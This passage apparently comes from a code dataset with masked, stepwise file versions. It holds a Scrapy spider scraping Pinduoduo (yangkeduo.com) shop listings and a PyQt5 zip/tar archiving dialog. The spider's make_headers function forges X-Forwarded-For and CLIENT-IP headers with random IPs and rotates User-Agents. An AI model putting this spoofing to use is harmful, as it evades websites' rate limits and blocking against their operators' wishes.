pyssdb.Client(get_project_settings().get(\n 'SSDB_HOST'), 8888)\n self.hash_num = int(hash_num)\n self.process_nums = int(process_nums)\n self.pageSize = 500\n\n def start_requests(self):\n mall_nums = self.limit * int(self.process_nums)\n is_end = False\n start_mall_id = ''\n while not is_end:\n mall_ids = self.ssdb_client.hkeys(self.mall_id_hash,\n start_mall_id, '', mall_nums)\n if not mall_ids:\n is_end = True\n continue\n for mall_id in mall_ids:\n mall_id = int(mall_id.decode('utf-8'))\n start_mall_id = mall_id\n if mall_id % self.process_nums != self.hash_num:\n continue\n goods_list = []\n page = 1\n headers = self.make_headers()\n url = (\n 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='\n + str(mall_id) + '&page_no=' + str(page) +\n '&page_size=500')\n meta = {'page': page, 'mall_id': mall_id, 'goods_list':\n goods_list}\n yield scrapy.Request(url, meta=meta, callback=self.parse,\n headers=headers)\n <mask token>\n <mask token>\n\n def make_headers(self):\n chrome_version = str(random.randint(59, 63)) + '.0.' + str(random.\n randint(1000, 3200)) + '.94'\n headers = {'Host': 'yangkeduo.com', 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\n , 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Accept-Encoding': 'gzip, deflate', 'Host': 'yangkeduo.com',\n 'Referer':\n 'http://yangkeduo.com/goods.html?goods_id=442573047&from_subject_id=935&is_spike=0&refer_page_name=subject&refer_page_id=subject_1515726808272_1M143fWqjQ&refer_page_sn=10026'\n , 'Connection': 'keep-alive', 'User-Agent': \n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'\n + chrome_version + ' Safari/537.36'}\n ip = str(random.randint(100, 200)) + '.' + str(random.randint(1, 255)\n ) + '.' + str(random.randint(1, 255)) + '.' + str(random.\n randint(1, 255))\n headers['CLIENT-IP'] = ip\n headers['X-FORWARDED-FOR'] = ip\n return headers\n", "step-3": "<mask token>\n\n\nclass PddMallGoodsSpider(scrapy.Spider):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, hash_num=0, process_nums=1):\n self.ssdb_client = pyssdb.Client(get_project_settings().get(\n 'SSDB_HOST'), 8888)\n self.hash_num = int(hash_num)\n self.process_nums = int(process_nums)\n self.pageSize = 500\n\n def start_requests(self):\n mall_nums = self.limit * int(self.process_nums)\n is_end = False\n start_mall_id = ''\n while not is_end:\n mall_ids = self.ssdb_client.hkeys(self.mall_id_hash,\n start_mall_id, '', mall_nums)\n if not mall_ids:\n is_end = True\n continue\n for mall_id in mall_ids:\n mall_id = int(mall_id.decode('utf-8'))\n start_mall_id = mall_id\n if mall_id % self.process_nums != self.hash_num:\n continue\n goods_list = []\n page = 1\n headers = self.make_headers()\n url = (\n 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='\n + str(mall_id) + '&page_no=' + str(page) +\n '&page_size=500')\n meta = {'page': page, 'mall_id': mall_id, 'goods_list':\n goods_list}\n yield scrapy.Request(url, meta=meta, callback=self.parse,\n headers=headers)\n\n def parse(self, response):\n pass\n goods_list = response.meta['goods_list']\n mall_id = response.meta['mall_id']\n page = response.meta['page']\n mall_goods = response.body.decode('utf-8')\n mall_goods = json.loads(mall_goods)\n goods_len = len(mall_goods['goods_list'])\n if goods_len > 0:\n goods_list = goods_list + mall_goods['goods_list']\n if goods_len > self.pageSize - 100:\n page += 1\n url = (\n 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='\n + str(mall_id) + '&page_no=' + str(page) + '&page_size=500')\n meta = {'page': page, 'mall_id': mall_id, 'goods_list': goods_list}\n headers = self.make_headers()\n yield scrapy.Request(url, meta=meta, callback=self.parse,\n headers=headers)\n elif goods_list:\n item = GoodsSalesItem()\n item['goods_list'] = goods_list\n item['mall_id'] = mall_id\n yield item\n <mask token>\n\n def make_headers(self):\n chrome_version = str(random.randint(59, 63)) + '.0.' + str(random.\n randint(1000, 3200)) + '.94'\n headers = {'Host': 'yangkeduo.com', 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\n , 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Accept-Encoding': 'gzip, deflate', 'Host': 'yangkeduo.com',\n 'Referer':\n 'http://yangkeduo.com/goods.html?goods_id=442573047&from_subject_id=935&is_spike=0&refer_page_name=subject&refer_page_id=subject_1515726808272_1M143fWqjQ&refer_page_sn=10026'\n , 'Connection': 'keep-alive', 'User-Agent': \n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'\n + chrome_version + ' Safari/537.36'}\n ip = str(random.randint(100, 200)) + '.' + str(random.randint(1, 255)\n ) + '.' + str(random.randint(1, 255)) + '.' + str(random.\n randint(1, 255))\n headers['CLIENT-IP'] = ip\n headers['X-FORWARDED-FOR'] = ip\n return headers\n", "step-4": "import scrapy\nimport json, time, sys, random, re, pyssdb\nfrom scrapy.utils.project import get_project_settings\nfrom spider.items import GoodsSalesItem\ngoods_list = []\n<mask token>\n\n\nclass PddMallGoodsSpider(scrapy.Spider):\n name = 'pdd_mall_goods'\n mall_id_hash = 'pdd_mall_id_hash'\n hash_num = 0\n ssdb_client = ''\n process_nums = 1\n limit = 100\n\n def __init__(self, hash_num=0, process_nums=1):\n self.ssdb_client = pyssdb.Client(get_project_settings().get(\n 'SSDB_HOST'), 8888)\n self.hash_num = int(hash_num)\n self.process_nums = int(process_nums)\n self.pageSize = 500\n\n def start_requests(self):\n mall_nums = self.limit * int(self.process_nums)\n is_end = False\n start_mall_id = ''\n while not is_end:\n mall_ids = self.ssdb_client.hkeys(self.mall_id_hash,\n start_mall_id, '', mall_nums)\n if not mall_ids:\n is_end = True\n continue\n for mall_id in mall_ids:\n mall_id = int(mall_id.decode('utf-8'))\n start_mall_id = mall_id\n if mall_id % self.process_nums != self.hash_num:\n continue\n goods_list = []\n page = 1\n headers = self.make_headers()\n url = (\n 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='\n + str(mall_id) + '&page_no=' + str(page) +\n '&page_size=500')\n meta = {'page': page, 'mall_id': mall_id, 'goods_list':\n goods_list}\n yield scrapy.Request(url, meta=meta, callback=self.parse,\n headers=headers)\n\n def parse(self, response):\n pass\n goods_list = response.meta['goods_list']\n mall_id = response.meta['mall_id']\n page = response.meta['page']\n mall_goods = response.body.decode('utf-8')\n mall_goods = json.loads(mall_goods)\n goods_len = len(mall_goods['goods_list'])\n if goods_len > 0:\n goods_list = goods_list + mall_goods['goods_list']\n if goods_len > self.pageSize - 100:\n page += 1\n url = (\n 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='\n + str(mall_id) + '&page_no=' + str(page) + '&page_size=500')\n meta = {'page': page, 'mall_id': mall_id, 'goods_list': goods_list}\n headers = self.make_headers()\n yield scrapy.Request(url, meta=meta, callback=self.parse,\n headers=headers)\n elif goods_list:\n item = GoodsSalesItem()\n item['goods_list'] = goods_list\n item['mall_id'] = mall_id\n yield item\n \"\"\"生成headers头信息\"\"\"\n\n def make_headers(self):\n chrome_version = str(random.randint(59, 63)) + '.0.' + str(random.\n randint(1000, 3200)) + '.94'\n headers = {'Host': 'yangkeduo.com', 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\n , 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Accept-Encoding': 'gzip, deflate', 'Host': 'yangkeduo.com',\n 'Referer':\n 'http://yangkeduo.com/goods.html?goods_id=442573047&from_subject_id=935&is_spike=0&refer_page_name=subject&refer_page_id=subject_1515726808272_1M143fWqjQ&refer_page_sn=10026'\n , 'Connection': 'keep-alive', 'User-Agent': \n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'\n + chrome_version + ' Safari/537.36'}\n ip = str(random.randint(100, 200)) + '.' + str(random.randint(1, 255)\n ) + '.' + str(random.randint(1, 255)) + '.' + str(random.\n randint(1, 255))\n headers['CLIENT-IP'] = ip\n headers['X-FORWARDED-FOR'] = ip\n return headers\n", "step-5": "# -*- coding: utf-8 -*-\r\nimport scrapy\r\nimport json, time, sys, random, re, pyssdb\r\n\r\nfrom scrapy.utils.project import get_project_settings\r\n\r\nfrom spider.items import GoodsSalesItem\r\n\r\ngoods_list = []\r\n'''获取店铺内产品信息'''\r\nclass PddMallGoodsSpider(scrapy.Spider):\r\n\tname = 'pdd_mall_goods'\r\n\tmall_id_hash \t= 'pdd_mall_id_hash'\r\n\thash_num \t\t= 0\r\n\tssdb_client = ''\r\n\tprocess_nums \t= 1\r\n\tlimit\t\t\t= 100\r\n\r\n\tdef __init__(self, hash_num = 0, process_nums = 1):\r\n\t\tself.ssdb_client = pyssdb.Client(get_project_settings().get('SSDB_HOST'), 8888)\r\n\t\tself.hash_num = int(hash_num) ##当前脚本号\r\n\t\tself.process_nums = int(process_nums) ##脚本总数\r\n\t\tself.pageSize = 500 ##每次抓取的产品数 最大只返回500\r\n\r\n\tdef start_requests(self):\r\n\t\tmall_nums \t\t= \tself.limit * int(self.process_nums) ##一次查询的数量\r\n\r\n\t\tis_end \t\t\t=\tFalse\r\n\t\tstart_mall_id \t=\t'' ##起始查询的店铺key\r\n\t\twhile not is_end:\r\n\t\t\tmall_ids \t=\tself.ssdb_client.hkeys(self.mall_id_hash, start_mall_id, '', mall_nums)\r\n\t\t\t\r\n\t\t\tif not mall_ids: ##没有数据返回\r\n\t\t\t\tis_end \t=\tTrue\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tfor mall_id in mall_ids:\r\n\t\t\t\tmall_id = int( mall_id.decode('utf-8') )\r\n\t\t\t\tstart_mall_id = mall_id\r\n\r\n\t\t\t\tif mall_id % self.process_nums != self.hash_num:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t\t\r\n\t\t\t\tgoods_list=[]\r\n\t\t\t\tpage = 1\r\n\r\n\t\t\t\theaders = self.make_headers()\r\n\t\t\t\turl = 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='+str(mall_id)+'&page_no='+str(page)+'&page_size=500'\r\n\t\t\t\tmeta = {'page':page, 'mall_id':mall_id, 'goods_list':goods_list}\r\n\t\t\t\tyield scrapy.Request(url, meta=meta, callback=self.parse, headers=headers)\r\n\t\t\t\r\n\tdef parse(self, response):\r\n\t\tpass\r\n\t\tgoods_list=response.meta['goods_list'] ##产品集合\r\n\t\tmall_id = response.meta['mall_id'] ##店铺ID\r\n\t\tpage \t = response.meta['page'] ##每返回一次页面数据 记录页数\r\n\r\n\t\tmall_goods = response.body.decode('utf-8') ##bytes转换为str\r\n\t\tmall_goods = json.loads(mall_goods)\r\n\r\n\t\tgoods_len = len(mall_goods['goods_list'])\r\n\r\n\t\tif goods_len > 0:\r\n\t\t\tgoods_list = goods_list + mall_goods['goods_list'] ##合并产品列表\r\n\r\n\t\tif goods_len > self.pageSize - 100:\r\n\t\t\tpage += 1\r\n\t\t\t##继续采集下一页面\r\n\t\t\turl = 'http://apiv4.yangkeduo.com/api/turing/mall/query_cat_goods?category_id=0&type=0&sort_type=_sales&mall_id='+str(mall_id)+'&page_no='+str(page)+'&page_size=500'\r\n\t\t\tmeta = {'page':page, 'mall_id':mall_id, 'goods_list':goods_list}\r\n\t\t\theaders = self.make_headers()\r\n\t\t\tyield scrapy.Request(url, meta=meta, callback=self.parse, headers=headers)\r\n\t\telse:\r\n\t\t\tif goods_list:\r\n\t\t\t\titem = GoodsSalesItem()\r\n\t\t\t\titem['goods_list'] = goods_list\r\n\t\t\t\titem['mall_id'] = mall_id\r\n\t\t\t\tyield item\r\n\r\n\t'''生成headers头信息'''\r\n\tdef make_headers(self):\r\n\t\tchrome_version = str(random.randint(59,63))+'.0.'+str(random.randint(1000,3200))+'.94'\r\n\t\theaders = {\r\n\t\t\t\"Host\":\"yangkeduo.com\",\r\n\t\t\t\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\r\n\t\t\t\"Accept-Language\":\"zh-CN,zh;q=0.9,en;q=0.8\",\r\n\t\t\t\"Accept-Encoding\":\"gzip, deflate\",\r\n\t\t\t\"Host\":\"yangkeduo.com\",\r\n\t\t\t\"Referer\":\"http://yangkeduo.com/goods.html?goods_id=442573047&from_subject_id=935&is_spike=0&refer_page_name=subject&refer_page_id=subject_1515726808272_1M143fWqjQ&refer_page_sn=10026\",\r\n\t\t\t\"Connection\":\"keep-alive\",\r\n\t\t\t'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'+chrome_version+' Safari/537.36',\r\n\t\t}\r\n\t\t\r\n\t\tip = str(random.randint(100, 200))+'.'+str(random.randint(1, 255))+'.'+str(random.randint(1, 255))+'.'+str(random.randint(1, 255))\r\n\t\theaders['CLIENT-IP'] \t=\tip\r\n\t\theaders['X-FORWARDED-FOR']=\tip\r\n\t\treturn headers", "step-ids": [ 3, 4, 5, 9, 10 ] }
[ 3, 4, 5, 9, 10 ]
__author__ = 'piotrek' import os import zipfile import tarfile from PyQt5 import QtWidgets from PyQt5 import QtGui from PyQt5 import QtCore from Widgets.list_view import ListView from Threads.PackThread import PackThread class CreateArchive(QtWidgets.QDialog): def __init__(self, model, index, path, parent=None): super().__init__(parent) self.setWindowTitle('Utworz archiwum') self.setWindowModality(QtCore.Qt.WindowModal) self.resize(350, 400) self.path = path self.file_model = model self.index = index self.create_components() self.create_layout() self.pack_thread = PackThread() self.pack_thread.status_signal.connect(self.ended) self.pack_thread.progress_signal.connect(self.progress) self.pack_thread.access_signal.connect(self.access) def create_item(self, index): path = os.path.abspath(self.file_model.filePath(index)) item = QtGui.QStandardItem(os.path.basename(path)) item.setIcon(self.file_model.fileIcon(index)) item.setCheckable(True) item.setEditable(False) return item def create_components(self): self.option_widget = QtWidgets.QWidget() self.name_lbl = QtWidgets.QLabel('Nazwa') self.name_edit = QtWidgets.QLineEdit('untitled') self.name_edit.setMaxLength(30) self.name_edit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp('\w{30}'), self.name_edit)) self.archive_type_cb = QtWidgets.QComboBox() self.archive_type_cb.addItem('.zip') self.archive_type_cb.addItem('.tar') self.path_lbl = QtWidgets.QLabel(self.path) self.path_lbl.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Preferred) self.path_lbl.setFrameShape(QtWidgets.QFrame.StyledPanel) self.path_lbl.setFrameShadow(QtWidgets.QFrame.Sunken) self.set_path_btn = QtWidgets.QPushButton('Sciezka', clicked=self.set_path) self.file_list = ListView('Pliki do zapakowania') self.file_list.add_element(self.index) self.file_list.add_to_model(self.create_item(self.index)) self.add_folder_btn = QtWidgets.QPushButton('Dodaj katalog', clicked=self.add_catalog) self.add_file_btn = QtWidgets.QPushButton('Dodaj plik', clicked=self.add_file) self.remove_selected_btn = QtWidgets.QPushButton('Usun zaznaczone', clicked=self.file_list.remove_selected) self.progress_bar = QtWidgets.QProgressBar() self.progress_bar.setMinimum(0) self.progress_lbl = QtWidgets.QLabel() self.pack_btn = QtWidgets.QPushButton('Zapakuj', clicked=self.pack_files) def set_path(self): path = QtWidgets.QFileDialog.getExistingDirectory(self, 'Wybierz katalog', QtCore.QDir.homePath()) if path: self.path = path self.path_lbl.setText(self.path) def create_layout(self): option_layout = QtWidgets.QGridLayout() v_option_layout = QtWidgets.QVBoxLayout() main_layout = QtWidgets.QGridLayout() v_main_layout = QtWidgets.QVBoxLayout() h_name_layout = QtWidgets.QHBoxLayout() h_name_layout.addWidget(self.name_lbl) h_name_layout.addWidget(self.name_edit) h_name_layout.addWidget(self.archive_type_cb) v_option_layout.addLayout(h_name_layout) h_path_layout = QtWidgets.QHBoxLayout() h_path_layout.addWidget(self.path_lbl) h_path_layout.addWidget(self.set_path_btn) v_option_layout.addLayout(h_path_layout) v_option_layout.addWidget(self.file_list) h_remove_layout = QtWidgets.QHBoxLayout() h_remove_layout.addWidget(self.add_folder_btn) h_remove_layout.addWidget(self.add_file_btn) h_remove_layout.addWidget(self.remove_selected_btn) v_option_layout.addLayout(h_remove_layout) option_layout.addLayout(v_option_layout, 0, 0, 1, 1) self.option_widget.setLayout(option_layout) v_main_layout.addWidget(self.option_widget) v_main_layout.addWidget(self.progress_bar) v_main_layout.addWidget(self.pack_btn) main_layout.addLayout(v_main_layout, 0, 0, 1, 1) self.setLayout(main_layout) def pack_files(self): if not self.name_edit.text(): return if not self.file_list.get_quantity(): return self.option_widget.setEnabled(False) self.progress_bar.setMaximum(0) name = self.name_edit.text() + self.archive_type_cb.itemData(self.archive_type_cb.currentIndex(), QtCore.Qt.DisplayRole) path = self.path_lbl.text() list_index = self.file_list.get_index_list() path_list = [self.file_model.filePath(index) for index in list_index] if self.archive_type_cb.currentText() == '.zip': self.pack_thread.set(pack_zip, name, path, path_list) elif self.archive_type_cb.currentText() == '.tar': self.pack_thread.set(pack_tar, name, path, path_list) self.pack_thread.start() def add_catalog(self): catalog = QtWidgets.QFileDialog.getExistingDirectory(self, 'Wybierz katalog', QtCore.QDir.homePath()) if catalog and not QtCore.QFileInfo(catalog).isSymLink(): index = self.file_model.index(catalog) if index not in self.file_list: self.file_list.add_element(index) self.file_list.add_to_model(self.create_item(index)) def add_file(self): file, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Wybierz plik', QtCore.QDir.homePath()) if file: index = self.file_model.index(file) if index not in self.file_list: self.file_list.add_element(index) self.file_list.add_to_model(self.create_item(index)) def ended(self): self.parent().trayIcon.showMessage('Zakonczono', 'Zakonczono zapakowywanie pliku {0}'.format(self.pack_thread.name), QtWidgets.QSystemTrayIcon.Information, 2000) self.pack_btn.setText('Zamknij') self.progress_bar.setMaximum(1) self.progress_bar.setValue(1) self.pack_thread.terminate() self.pack_btn.clicked.connect(self.close) def access(self): self.setWindowTitle('Brak dostepu') self.pack_btn.setText('Zamknij') self.progress_bar.setMaximum(1) self.progress_bar.setValue(1) self.pack_thread.terminate() self.pack_btn.clicked.connect(self.close) def progress(self, info): print('info', info) # remove self.setWindowTitle(info) def closeEvent(self, QCloseEvent): if not self.pack_thread.ended: QCloseEvent.ignore() self.parent().catalog_list.setRootIndex(self.parent().catalog_list.rootIndex()) self.parent().catalog_list.scrollTo(self.parent().catalog_list.currentIndex()) self.parent().model_list.refresh(self.parent().catalog_list.rootIndex()) def pack_tar(thread, name, target_path, path_list): tar_path = os.path.join(os.path.abspath(target_path), name) try: with tarfile.open(tar_path, 'w') as tar_file: for file_path in path_list: if not os.path.isdir(file_path): thread.progress_signal.emit(file_path) tar_file.add(file_path, arcname=os.path.basename(file_path)) else: catalog_path = os.path.dirname(os.path.abspath(file_path)) for root_folder, subfolders, files in os.walk(file_path): for file in files: thread.in_progress_signal.emit(os.path.join(root_folder, file)) tar_file.add(os.path.join(root_folder, file), arcname=os.path.join(root_folder[len(catalog_path) + 1:], file)) except IOError: thread.access_signal.emit() def pack_zip(thread, name, target_path, path_list): zip_path = os.path.join(os.path.abspath(target_path), name) try: with zipfile.ZipFile(zip_path, 'w') as zip_file: for path_file in path_list: if not os.path.isdir(path_file): thread.progress_signal.emit(path_file) zip_file.write(path_file, arcname=os.path.basename(path_file)) else: path_folder = os.path.dirname(os.path.abspath(path_file)) for root_folder, subfolders, files in os.walk(path_file): for file in files: thread.emit(os.path.join(root_folder, file)) zip_file.write(os.path.join(root_folder, file), arcname=os.path.join(root_folder[len(path_folder) + 1:], file)) except IOError: thread.access_signal.emit()
normal
{ "blob_id": "7a41826f65f2f55b4c678df2ac06027df6ca50d4", "index": 3623, "step-1": "<mask token>\n\n\nclass CreateArchive(QtWidgets.QDialog):\n <mask token>\n <mask token>\n\n def create_components(self):\n self.option_widget = QtWidgets.QWidget()\n self.name_lbl = QtWidgets.QLabel('Nazwa')\n self.name_edit = QtWidgets.QLineEdit('untitled')\n self.name_edit.setMaxLength(30)\n self.name_edit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp(\n '\\\\w{30}'), self.name_edit))\n self.archive_type_cb = QtWidgets.QComboBox()\n self.archive_type_cb.addItem('.zip')\n self.archive_type_cb.addItem('.tar')\n self.path_lbl = QtWidgets.QLabel(self.path)\n self.path_lbl.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding,\n QtWidgets.QSizePolicy.Preferred)\n self.path_lbl.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.path_lbl.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.set_path_btn = QtWidgets.QPushButton('Sciezka', clicked=self.\n set_path)\n self.file_list = ListView('Pliki do zapakowania')\n self.file_list.add_element(self.index)\n self.file_list.add_to_model(self.create_item(self.index))\n self.add_folder_btn = QtWidgets.QPushButton('Dodaj katalog',\n clicked=self.add_catalog)\n self.add_file_btn = QtWidgets.QPushButton('Dodaj plik', clicked=\n self.add_file)\n self.remove_selected_btn = QtWidgets.QPushButton('Usun zaznaczone',\n clicked=self.file_list.remove_selected)\n self.progress_bar = QtWidgets.QProgressBar()\n self.progress_bar.setMinimum(0)\n self.progress_lbl = QtWidgets.QLabel()\n self.pack_btn = QtWidgets.QPushButton('Zapakuj', clicked=self.\n pack_files)\n\n def set_path(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self,\n 'Wybierz katalog', QtCore.QDir.homePath())\n if path:\n self.path = path\n self.path_lbl.setText(self.path)\n\n def create_layout(self):\n option_layout = QtWidgets.QGridLayout()\n v_option_layout = QtWidgets.QVBoxLayout()\n main_layout = QtWidgets.QGridLayout()\n v_main_layout = QtWidgets.QVBoxLayout()\n h_name_layout = QtWidgets.QHBoxLayout()\n h_name_layout.addWidget(self.name_lbl)\n h_name_layout.addWidget(self.name_edit)\n h_name_layout.addWidget(self.archive_type_cb)\n v_option_layout.addLayout(h_name_layout)\n h_path_layout = QtWidgets.QHBoxLayout()\n h_path_layout.addWidget(self.path_lbl)\n h_path_layout.addWidget(self.set_path_btn)\n v_option_layout.addLayout(h_path_layout)\n v_option_layout.addWidget(self.file_list)\n h_remove_layout = QtWidgets.QHBoxLayout()\n h_remove_layout.addWidget(self.add_folder_btn)\n h_remove_layout.addWidget(self.add_file_btn)\n h_remove_layout.addWidget(self.remove_selected_btn)\n v_option_layout.addLayout(h_remove_layout)\n option_layout.addLayout(v_option_layout, 0, 0, 1, 1)\n self.option_widget.setLayout(option_layout)\n v_main_layout.addWidget(self.option_widget)\n v_main_layout.addWidget(self.progress_bar)\n v_main_layout.addWidget(self.pack_btn)\n main_layout.addLayout(v_main_layout, 0, 0, 1, 1)\n self.setLayout(main_layout)\n\n def pack_files(self):\n if not self.name_edit.text():\n return\n if not self.file_list.get_quantity():\n return\n self.option_widget.setEnabled(False)\n self.progress_bar.setMaximum(0)\n name = self.name_edit.text() + self.archive_type_cb.itemData(self.\n archive_type_cb.currentIndex(), QtCore.Qt.DisplayRole)\n path = self.path_lbl.text()\n list_index = self.file_list.get_index_list()\n path_list = [self.file_model.filePath(index) for index in list_index]\n if self.archive_type_cb.currentText() == '.zip':\n self.pack_thread.set(pack_zip, name, path, path_list)\n elif self.archive_type_cb.currentText() == '.tar':\n self.pack_thread.set(pack_tar, name, path, path_list)\n self.pack_thread.start()\n <mask token>\n\n def add_file(self):\n file, _filter = QtWidgets.QFileDialog.getOpenFileName(self,\n 'Wybierz plik', QtCore.QDir.homePath())\n if file:\n index = self.file_model.index(file)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def ended(self):\n self.parent().trayIcon.showMessage('Zakonczono',\n 'Zakonczono zapakowywanie pliku {0}'.format(self.pack_thread.\n name), QtWidgets.QSystemTrayIcon.Information, 2000)\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n <mask token>\n\n def progress(self, info):\n print('info', info)\n self.setWindowTitle(info)\n\n def closeEvent(self, QCloseEvent):\n if not self.pack_thread.ended:\n QCloseEvent.ignore()\n self.parent().catalog_list.setRootIndex(self.parent().catalog_list.\n rootIndex())\n self.parent().catalog_list.scrollTo(self.parent().catalog_list.\n currentIndex())\n self.parent().model_list.refresh(self.parent().catalog_list.rootIndex()\n )\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass CreateArchive(QtWidgets.QDialog):\n <mask token>\n\n def create_item(self, index):\n path = os.path.abspath(self.file_model.filePath(index))\n item = QtGui.QStandardItem(os.path.basename(path))\n item.setIcon(self.file_model.fileIcon(index))\n item.setCheckable(True)\n item.setEditable(False)\n return item\n\n def create_components(self):\n self.option_widget = QtWidgets.QWidget()\n self.name_lbl = QtWidgets.QLabel('Nazwa')\n self.name_edit = QtWidgets.QLineEdit('untitled')\n self.name_edit.setMaxLength(30)\n self.name_edit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp(\n '\\\\w{30}'), self.name_edit))\n self.archive_type_cb = QtWidgets.QComboBox()\n self.archive_type_cb.addItem('.zip')\n self.archive_type_cb.addItem('.tar')\n self.path_lbl = QtWidgets.QLabel(self.path)\n self.path_lbl.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding,\n QtWidgets.QSizePolicy.Preferred)\n self.path_lbl.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.path_lbl.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.set_path_btn = QtWidgets.QPushButton('Sciezka', clicked=self.\n set_path)\n self.file_list = ListView('Pliki do zapakowania')\n self.file_list.add_element(self.index)\n self.file_list.add_to_model(self.create_item(self.index))\n self.add_folder_btn = QtWidgets.QPushButton('Dodaj katalog',\n clicked=self.add_catalog)\n self.add_file_btn = QtWidgets.QPushButton('Dodaj plik', clicked=\n self.add_file)\n self.remove_selected_btn = QtWidgets.QPushButton('Usun zaznaczone',\n clicked=self.file_list.remove_selected)\n self.progress_bar = QtWidgets.QProgressBar()\n self.progress_bar.setMinimum(0)\n self.progress_lbl = QtWidgets.QLabel()\n self.pack_btn = QtWidgets.QPushButton('Zapakuj', clicked=self.\n pack_files)\n\n def set_path(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self,\n 'Wybierz katalog', QtCore.QDir.homePath())\n if path:\n self.path = path\n self.path_lbl.setText(self.path)\n\n def create_layout(self):\n option_layout = QtWidgets.QGridLayout()\n v_option_layout = QtWidgets.QVBoxLayout()\n main_layout = QtWidgets.QGridLayout()\n v_main_layout = QtWidgets.QVBoxLayout()\n h_name_layout = QtWidgets.QHBoxLayout()\n h_name_layout.addWidget(self.name_lbl)\n h_name_layout.addWidget(self.name_edit)\n h_name_layout.addWidget(self.archive_type_cb)\n v_option_layout.addLayout(h_name_layout)\n h_path_layout = QtWidgets.QHBoxLayout()\n h_path_layout.addWidget(self.path_lbl)\n h_path_layout.addWidget(self.set_path_btn)\n v_option_layout.addLayout(h_path_layout)\n v_option_layout.addWidget(self.file_list)\n h_remove_layout = QtWidgets.QHBoxLayout()\n h_remove_layout.addWidget(self.add_folder_btn)\n h_remove_layout.addWidget(self.add_file_btn)\n h_remove_layout.addWidget(self.remove_selected_btn)\n v_option_layout.addLayout(h_remove_layout)\n option_layout.addLayout(v_option_layout, 0, 0, 1, 1)\n self.option_widget.setLayout(option_layout)\n v_main_layout.addWidget(self.option_widget)\n v_main_layout.addWidget(self.progress_bar)\n v_main_layout.addWidget(self.pack_btn)\n main_layout.addLayout(v_main_layout, 0, 0, 1, 1)\n self.setLayout(main_layout)\n\n def pack_files(self):\n if not self.name_edit.text():\n return\n if not self.file_list.get_quantity():\n return\n self.option_widget.setEnabled(False)\n self.progress_bar.setMaximum(0)\n name = self.name_edit.text() + self.archive_type_cb.itemData(self.\n archive_type_cb.currentIndex(), QtCore.Qt.DisplayRole)\n path = self.path_lbl.text()\n list_index = self.file_list.get_index_list()\n path_list = [self.file_model.filePath(index) for index in list_index]\n if self.archive_type_cb.currentText() == '.zip':\n self.pack_thread.set(pack_zip, name, path, path_list)\n elif self.archive_type_cb.currentText() == '.tar':\n self.pack_thread.set(pack_tar, name, path, path_list)\n self.pack_thread.start()\n <mask token>\n\n def add_file(self):\n file, _filter = QtWidgets.QFileDialog.getOpenFileName(self,\n 'Wybierz plik', QtCore.QDir.homePath())\n if file:\n index = self.file_model.index(file)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def ended(self):\n self.parent().trayIcon.showMessage('Zakonczono',\n 'Zakonczono zapakowywanie pliku {0}'.format(self.pack_thread.\n name), QtWidgets.QSystemTrayIcon.Information, 2000)\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n <mask token>\n\n def progress(self, info):\n print('info', info)\n self.setWindowTitle(info)\n\n def closeEvent(self, QCloseEvent):\n if not self.pack_thread.ended:\n QCloseEvent.ignore()\n self.parent().catalog_list.setRootIndex(self.parent().catalog_list.\n rootIndex())\n self.parent().catalog_list.scrollTo(self.parent().catalog_list.\n currentIndex())\n self.parent().model_list.refresh(self.parent().catalog_list.rootIndex()\n )\n\n\n<mask token>\n", "step-3": 